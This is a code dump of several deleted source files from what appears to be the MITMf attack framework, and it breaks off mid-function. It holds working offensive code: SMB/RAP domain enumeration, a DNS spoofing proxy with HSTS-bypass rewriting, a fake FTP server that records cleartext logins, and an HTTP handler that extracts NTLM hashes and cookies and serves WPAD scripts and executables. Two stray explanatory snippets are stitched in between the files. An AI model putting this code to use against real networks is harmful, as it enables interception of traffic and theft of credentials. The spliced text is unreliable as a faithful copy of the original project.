# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import threading
import core.responder.settings as settings
from core.responder.packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 138), Browser1)
t = threading.Thread(name='Browser', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Browser server on port 138: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def WorkstationFingerPrint(data):
Role = {
"\x04\x00" :"Windows 95",
"\x04\x10" :"Windows 98",
"\x04\x90" :"Windows ME",
"\x05\x00" :"Windows 2000",
"\x05\x00" :"Windows XP",
"\x05\x02" :"Windows 2003",
"\x06\x00" :"Windows Vista/Server 2008",
"\x06\x01" :"Windows 7/Server 2008R2",
}
return Role[data] if data in Role else "Unknown"
def RequestType(data):
Type = {
"\x01": 'Host Announcement',
"\x02": 'Request Announcement',
"\x08": 'Browser Election',
"\x09": 'Get Backup List Request',
"\x0a": 'Get Backup List Response',
"\x0b": 'Become Backup Browser',
"\x0c": 'Domain/Workgroup Announcement',
"\x0d": 'Master Announcement',
"\x0e": 'Reset Browser State Announcement',
"\x0f": 'Local Master Announcement',
}
return Type[data] if data in Type else "Unknown"
def PrintServerName(data, entries):
if entries > 0:
entrieslen = 26*entries
chunks, chunk_size = len(data[:entrieslen]), entrieslen/entries
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
l = []
for x in ServerName:
FP = WorkstationFingerPrint(x[16:18])
Name = x[:16].replace('\x00', '')
if FP:
l.append(Name + ' (%s)' % FP)
else:
l.append(Name)
return l
return None
def ParsePacket(Payload):
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
if StatusCode == "\x00\x00":
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
else:
return None
def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Domains: %s" % ', '.join(PDC))
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL)))
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None:
settings.Config.ResponderLogger.info("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST)))
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == "\x73\x00":
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34],mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == "\x75\x00":
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet))) + Packet
s.send(Buffer)
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == "\x25\x00":
s.close()
return ParsePacket(data)
except:
pass
def BecomeBackup(data,Client):
try:
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
if ReqType == "Become Backup Browser":
ServerName = BrowserPacket[1:]
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role = NBT_NS_Role(data[45:48])
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain))
print RAPThisDomain(Client, Domain)
except:
pass
def ParseDatagramNBTNames(data,Client):
try:
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role1 = NBT_NS_Role(data[45:48])
Role2 = NBT_NS_Role(data[79:82])
if Role2 == "Domain Controller" or Role2 == "Browser Election" or Role2 == "Local Master Browser" and settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning('[Analyze mode: Browser] Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s' % (Client, Name, Role1, Domain, Role2))
print RAPThisDomain(Client, Domain)
except:
pass
class Browser1(BaseRequestHandler):
def handle(self):
try:
request, socket = self.request
if settings.Config.AnalyzeMode:
ParseDatagramNBTNames(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
BecomeBackup(request,self.client_address[0])
except Exception:
pass

View file

@ -1,522 +0,0 @@
# DNSChef is a highly configurable DNS Proxy for Penetration Testers
# and Malware Analysts. Please visit http://thesprawl.org/projects/dnschef/
# for the latest version and documentation. Please forward all issues and
# concerns to iphelix [at] thesprawl.org.
# Copyright (C) 2015 Peter Kacherginsky, Marcello Salvati
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading, random, operator, time
import SocketServer, socket, sys, os
import binascii
import string
import base64
import time
import logging
from configobj import ConfigObj
from core.configwatcher import ConfigWatcher
from core.utils import shutdown
from core.logger import logger
from dnslib import *
from IPy import IP
formatter = logging.Formatter("%(asctime)s %(clientip)s [DNS] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("DNSChef", formatter)
dnslog = logging.getLogger('dnslog')
handler = logging.FileHandler('./logs/dns/dns.log',)
handler.setFormatter(formatter)
dnslog.addHandler(handler)
dnslog.setLevel(logging.INFO)
# DNSHandler Mixin. The class contains generic functions to parse DNS requests and
# calculate an appropriate response based on user parameters.
class DNSHandler():
def parse(self,data):
nametodns = DNSChef().nametodns
nameservers = DNSChef().nameservers
hsts = DNSChef().hsts
hstsconfig = DNSChef().real_records
server_address = DNSChef().server_address
clientip = {"clientip": self.client_address[0]}
response = ""
try:
# Parse data as DNS
d = DNSRecord.parse(data)
except Exception as e:
log.info("Error: invalid DNS request", extra=clientip)
dnslog.info("Error: invalid DNS request", extra=clientip)
else:
# Only Process DNS Queries
if QR[d.header.qr] == "QUERY":
# Gather query parameters
# NOTE: Do not lowercase qname here, because we want to see
# any case request weirdness in the logs.
qname = str(d.q.qname)
# Chop off the last period
if qname[-1] == '.': qname = qname[:-1]
qtype = QTYPE[d.q.qtype]
# Find all matching fake DNS records for the query name or get False
fake_records = dict()
for record in nametodns:
fake_records[record] = self.findnametodns(qname, nametodns[record])
if hsts:
if qname in hstsconfig:
response = self.hstsbypass(hstsconfig[qname], qname, nameservers, d)
return response
elif qname[:4] == 'wwww':
response = self.hstsbypass(qname[1:], qname, nameservers, d)
return response
elif qname[:3] == 'web':
response = self.hstsbypass(qname[3:], qname, nameservers, d)
return response
# Check if there is a fake record for the current request qtype
if qtype in fake_records and fake_records[qtype]:
fake_record = fake_records[qtype]
# Create a custom response to the query
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
log.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} to {}".format(qtype, qname, fake_record), extra=clientip)
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
ipv6_hex_tuple = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](ipv6_hex_tuple)))
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer( RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,DNSLabel(replacement))) )
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig)))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
elif qtype == "*" and not None in fake_records.values():
log.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
dnslog.info("Cooking the response of type '{}' for {} with {}".format("ANY", qname, "all known fake records."), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q)
for qtype,fake_record in fake_records.items():
if fake_record:
# NOTE: RDMAP is a dictionary map of qtype strings to handling classes
# IPv6 needs additional work before inclusion:
if qtype == "AAAA":
ipv6 = IP(fake_record)
ipv6_bin = ipv6.strBin()
fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)]
elif qtype == "SOA":
mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ")
times = tuple([int(t) for t in [t1,t2,t3,t4,t5]])
# dnslib doesn't like trailing dots
if mname[-1] == ".": mname = mname[:-1]
if rname[-1] == ".": rname = rname[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times)))
elif qtype == "NAPTR":
order,preference,flags,service,regexp,replacement = fake_record.split(" ")
order = int(order)
preference = int(preference)
# dnslib doesn't like trailing dots
if replacement and replacement[-1] == ".": replacement = replacement[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement)))
elif qtype == "SRV":
priority, weight, port, target = fake_record.split(" ")
priority = int(priority)
weight = int(weight)
port = int(port)
if target[-1] == ".": target = target[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) ))
elif qtype == "DNSKEY":
flags, protocol, algorithm, key = fake_record.split(" ")
flags = int(flags)
protocol = int(protocol)
algorithm = int(algorithm)
key = base64.b64decode(("".join(key)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) ))
elif qtype == "RRSIG":
covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ")
covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE
algorithm = int(algorithm)
labels = int(labels)
orig_ttl = int(orig_ttl)
sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z")))
sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z")))
key_tag = int(key_tag)
if name[-1] == '.': name = name[:-1]
sig = base64.b64decode(("".join(sig)).encode('ascii'))
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) ))
else:
# dnslib doesn't like trailing dots
if fake_record[-1] == ".": fake_record = fake_record[:-1]
response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record)))
response = response.pack()
# Proxy the request
else:
log.debug("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
dnslog.info("Proxying the response of type '{}' for {}".format(qtype, qname), extra=clientip)
nameserver_tuple = random.choice(nameservers).split('#')
response = self.proxyrequest(data, *nameserver_tuple)
return response
# Find appropriate ip address to use for a queried name. The function can also handle wildcard domains.
def findnametodns(self,qname,nametodns):
# Make qname case insensitive
qname = qname.lower()
# Split and reverse qname into components for matching.
qnamelist = qname.split('.')
qnamelist.reverse()
# HACK: It is important to search the nametodns dictionary before iterating it so that
# global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that.
for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)):
# NOTE: It is assumed that domain name was already lowercased
# when it was loaded through --file, --fakedomains or --truedomains
# don't want to waste time lowercasing domains on every request.
# Split and reverse domain into components for matching
domain = domain.split('.')
domain.reverse()
# Compare domains in reverse.
for a,b in map(None,qnamelist,domain):
if a != b and b != "*":
break
else:
# Could be a real IP or False if we are doing reverse matching with 'truedomains'
return host
else:
return False
# Obtain a response from a real DNS server.
def proxyrequest(self, request, host, port="53", protocol="udp"):
clientip = {'clientip': self.client_address[0]}
reply = None
try:
if DNSChef().ipv6:
if protocol == "udp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
else:
if protocol == "udp":
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
elif protocol == "tcp":
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(3.0)
# Send the proxy request to a randomly chosen DNS server
if protocol == "udp":
sock.sendto(request, (host, int(port)))
reply = sock.recv(1024)
sock.close()
elif protocol == "tcp":
sock.connect((host, int(port)))
# Add length for the TCP request
length = binascii.unhexlify("%04x" % len(request))
sock.sendall(length+request)
# Strip length from the response
reply = sock.recv(1024)
reply = reply[2:]
sock.close()
except Exception as e:
log.warning("Could not proxy request: {}".format(e), extra=clientip)
dnslog.info("Could not proxy request: {}".format(e), extra=clientip)
else:
return reply
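# HSTS bypass: resolve the real domain through an upstream nameserver, then rewrite the answer names back to the fake (e.g. 'wwww.'/'web.' prefixed) domain before packing the response.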
def hstsbypass(self, real_domain, fake_domain, nameservers, d):
clientip = {'clientip': self.client_address[0]}
log.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
dnslog.info("Resolving '{}' to '{}' for HSTS bypass".format(fake_domain, real_domain), extra=clientip)
response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q)
nameserver_tuple = random.choice(nameservers).split('#')
#First proxy the request with the real domain
q = DNSRecord.question(real_domain).pack()
r = self.proxyrequest(q, *nameserver_tuple)
if r is None: return None
#Parse the answer
dns_rr = DNSRecord.parse(r).rr
#Create the DNS response
for res in dns_rr:
if res.get_rname() == real_domain:
res.set_rname(fake_domain)
response.add_answer(res)
else:
response.add_answer(res)
return response.pack()
# UDP DNS Handler for incoming requests
class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
(data,socket) = self.request
response = self.parse(data)
if response:
socket.sendto(response, self.client_address)
# TCP DNS Handler for incoming requests
class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler):
def handle(self):
data = self.request.recv(1024)
# Remove the additional "length" parameter used in the
# TCP DNS protocol
data = data[2:]
response = self.parse(data)
if response:
# Calculate and add the additional "length" parameter
# used in TCP DNS protocol
length = binascii.unhexlify("%04x" % len(response))
self.request.sendall(length+response)
class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
# Override SocketServer.UDPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass)
class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer):
# Override default value
allow_reuse_address = True
# Override SocketServer.TCPServer to add extra parameters
def __init__(self, server_address, RequestHandlerClass):
self.address_family = socket.AF_INET6 if DNSChef().ipv6 else socket.AF_INET
SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass)
class DNSChef(ConfigWatcher):
version = "0.4"
tcp = False
ipv6 = False
hsts = False
real_records = {}
nametodns = {}
server_address = "0.0.0.0"
nameservers = ["8.8.8.8"]
port = 53
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def on_config_change(self):
config = self.config['MITMf']['DNS']
self.port = int(config['port'])
# Main storage of domain filters
# NOTE: RDMAP is a dictionary map of qtype strings to handling classes
for qtype in RDMAP.keys():
self.nametodns[qtype] = dict()
# Adjust defaults for IPv6
if config['ipv6'].lower() == 'on':
self.ipv6 = True
if config['nameservers'] == "8.8.8.8":
self.nameservers = "2001:4860:4860::8888"
# Use alternative DNS servers
if config['nameservers']:
self.nameservers = []
if type(config['nameservers']) is str:
self.nameservers.append(config['nameservers'])
elif type(config['nameservers']) is list:
self.nameservers = config['nameservers']
for section in config.sections:
if section in self.nametodns:
for domain,record in config[section].iteritems():
# Make domain case insensitive
domain = domain.lower()
self.nametodns[section][domain] = record
for k,v in self.config["SSLstrip+"].iteritems():
self.real_records[v] = k
def setHstsBypass(self):
self.hsts = True
def start(self):
self.on_config_change()
self.start_config_watch()
try:
if self.config['MITMf']['DNS']['tcp'].lower() == 'on':
self.startTCP()
else:
self.startUDP()
except socket.error as e:
if "Address already in use" in e:
shutdown("\n[DNS] Unable to start DNS server on port {}: port already in use".format(self.config['MITMf']['DNS']['port']))
# Initialize and start the DNS Server
def startUDP(self):
server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
# Initialize and start the DNS Server
def startTCP(self):
server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler)
# Start a thread with the server -- that thread will then start
# more threads for each request
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
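For reference, the wildcard matching performed in the nametodns lookup above (labels compared in reverse, with '*' matching any extra or differing label) can be expressed as a small standalone sketch; the helper name is illustrative only and not part of DNSChef:
try:
    from itertools import izip_longest as zip_longest  # Python 2
except ImportError:
    from itertools import zip_longest                   # Python 3

def matches(qname, pattern):
    # Compare labels right-to-left; '*' in the configured pattern matches
    # any (or a missing) label of the query name, mirroring the loop above.
    qlabels = qname.lower().split('.')[::-1]
    plabels = pattern.lower().split('.')[::-1]
    for q, p in zip_longest(qlabels, plabels):
        if q != p and p != '*':
            return False
    return True

assert matches('www.example.com', '*.example.com')
assert matches('example.com', 'example.com')
assert not matches('example.org', '*.example.com')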

View file

@ -1,87 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import threading
from traceback import print_exc
from core.responder.utils import *
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import FTPPacket
class FTP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 21), FTP1)
else:
server = ThreadingTCPServer(('', 21), FTP1)
t = threading.Thread(name='FTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting SMB server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class FTP1(BaseRequestHandler):
def handle(self):
try:
self.request.send(str(FTPPacket()))
data = self.request.recv(1024)
if data[0:4] == "USER":
User = data[5:].strip()
Packet = FTPPacket(Code="331",Message="User name okay, need password.")
self.request.send(str(Packet))
data = self.request.recv(1024)
if data[0:4] == "PASS":
Pass = data[5:].strip()
Packet = FTPPacket(Code="530",Message="User not logged in.")
self.request.send(str(Packet))
data = self.request.recv(1024)
SaveToDb({
'module': 'FTP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': User,
'cleartext': Pass,
'fullhash': User+':'+Pass
})
else:
Packet = FTPPacket(Code="502",Message="Command not implemented.")
self.request.send(str(Packet))
data = self.request.recv(1024)
except Exception:
pass
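What a connecting client would see from the fake FTP service above: the banner is sent first, USER is answered with 331, and PASS is answered with 530 after the credentials are logged. A hedged sketch from the client side (host and credentials are made up):
import ftplib

try:
    ftp = ftplib.FTP('192.168.1.10')   # greeted by the FTPPacket() banner
    ftp.login('alice', 'secret')       # USER -> 331, then PASS -> 530
except ftplib.error_perm:
    pass                               # login is rejected; credentials were already recorded via SaveToDb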

View file

@ -1,356 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from SocketServer import BaseServer, BaseRequestHandler, StreamRequestHandler, ThreadingMixIn, TCPServer
from base64 import b64decode, b64encode
from core.responder.utils import *
from core.logger import logger
from core.responder.packets import NTLM_Challenge
from core.responder.packets import IIS_Auth_401_Ans, IIS_Auth_Granted, IIS_NTLM_Challenge_Ans, IIS_Basic_401_Ans
from core.responder.packets import WPADScript, ServeExeFile, ServeHtmlFile
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("HTTP", formatter)
class HTTP:
static_endpoints = {}
endpoints = {}
@staticmethod
def add_endpoint(url, content_type, payload):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type), Payload=payload)
Buffer.calculate()
HTTP.endpoints['/' + url] = Buffer
@staticmethod
def add_static_endpoint(url, content_type, path):
Buffer = ServeHtmlFile(ContentType="Content-Type: {}\r\n".format(content_type))
HTTP.static_endpoints['/' + url] = {'buffer': Buffer, 'path': path}
def start(self):
try:
#if OsInterfaceIsSupported():
#server = ThreadingTCPServer((settings.Config.Bind_To, 80), HTTP1)
#else:
server = ThreadingTCPServer(('0.0.0.0', 80), HTTP1)
t = threading.Thread(name='HTTP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting HTTP server: {}".format(e)
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
# Parse NTLMv1/v2 hash.
def ParseHTTPHash(data, client):
LMhashLen = struct.unpack('<H',data[12:14])[0]
LMhashOffset = struct.unpack('<H',data[16:18])[0]
LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
NthashLen = struct.unpack('<H',data[20:22])[0]
NthashOffset = struct.unpack('<H',data[24:26])[0]
NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
UserLen = struct.unpack('<H',data[36:38])[0]
UserOffset = struct.unpack('<H',data[40:42])[0]
User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
if NthashLen == 24:
HostNameLen = struct.unpack('<H',data[46:48])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, settings.Config.NumChal)
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv1',
'client': client,
'host': HostName,
'user': User,
'hash': LMHash+":"+NTHash,
'fullhash': WriteHash,
})
if NthashLen > 24:
NthashLen = 64
DomainLen = struct.unpack('<H',data[28:30])[0]
DomainOffset = struct.unpack('<H',data[32:34])[0]
Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
HostNameLen = struct.unpack('<H',data[44:46])[0]
HostNameOffset = struct.unpack('<H',data[48:50])[0]
HostName = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
WriteHash = '%s::%s:%s:%s:%s' % (User, Domain, settings.Config.NumChal, NTHash[:32], NTHash[32:])
SaveToDb({
'module': 'HTTP',
'type': 'NTLMv2',
'client': client,
'host': HostName,
'user': Domain+'\\'+User,
'hash': NTHash[:32]+":"+NTHash[32:],
'fullhash': WriteHash,
})
def GrabCookie(data, host):
Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data)
if Cookie:
Cookie = Cookie.group(0).replace('Cookie: ', '')
if len(Cookie) > 1 and settings.Config.Verbose:
log.info("[HTTP] Cookie : {}".format(Cookie))
return Cookie
else:
return False
def GrabHost(data, host):
Host = re.search('(Host:*.\=*)[^\r\n]*', data)
if Host:
Host = Host.group(0).replace('Host: ', '')
if settings.Config.Verbose:
log.info("[HTTP] Host : {}".format(Host, 3))
return Host
else:
return False
def WpadCustom(data, client):
Wpad = re.search('(/wpad.dat|/*\.pac)', data)
if Wpad:
Buffer = WPADScript(Payload=settings.Config.WPAD_Script)
Buffer.calculate()
return str(Buffer)
else:
return False
def ServeFile(Filename):
with open (Filename, "rb") as bk:
data = bk.read()
bk.close()
return data
def RespondWithFile(client, filename, dlname=None):
if filename.endswith('.exe'):
Buffer = ServeExeFile(Payload = ServeFile(filename), ContentDiFile=dlname)
else:
